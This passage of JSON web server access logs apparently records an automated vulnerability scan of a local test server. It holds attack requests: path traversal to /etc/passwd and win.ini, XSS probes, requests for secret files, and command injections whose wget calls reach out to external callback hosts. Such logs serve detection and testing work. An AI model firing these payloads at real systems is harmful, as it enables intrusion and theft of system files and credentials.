AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?locale=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.www HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"system.listMethods","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.axiom/accounts/do.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.xhtml?faces-redirect=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iPages/i_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/health-check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/CI.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ViewUserHover.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fc9v8hs0smpv8c6ag07h0eger4qcxbot1n.oast.online%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/change HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/user.php HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /timesheet/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fc9v8hs0smpv8c6ag07h0dzykip9rt1win.oast.online%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/easy-media-gallery-pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/background.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/privatekey.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/system.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com;@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448 HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"logtype=XML&timezone=1%3Bwget+http%3A%2F%2Fc9v8hn0smpv8c57g0t00tbrm1qtjadqhy.oast.live%3B","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\x0D\x0AdataBlockSize=64\x0D\x0Atimeout=1\x0D\x0AnumberOfRepetitions=4\x0D\x0Ahost=$(echo 127.0.0.1; wget http://c9v8hs0smpv8c6ag07h0jzwabega5953x.oast.online)\x0D\x0AX_TP_ConnName=ewan_ipoe_d\x0D\x0AdiagnosticsState=Requested","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https%3a%2f%2fexample.com%2f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?7 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxcum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={\x22\xF0\x9F\xA6\x9E\x22:\x22test\x22} HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XmlPeek.aspx?dt=\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5CWindows\x5C\x5Cwin.ini&x=/validate.ashx?requri HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%0a%0dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:30 +0000","request_body":"------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22297MdpLAnSpHSEnK7kgG4DPYpMo.php\x22\x0D\x0A\x0D\x0A297Mdq9BEkAxgPFMors9vBsqY4I\x0D\x0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22name\x22\x0D\x0A\x0D\x0A297MdpLAnSpHSEnK7kgG4DPYpMo.php\x5Cx0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": 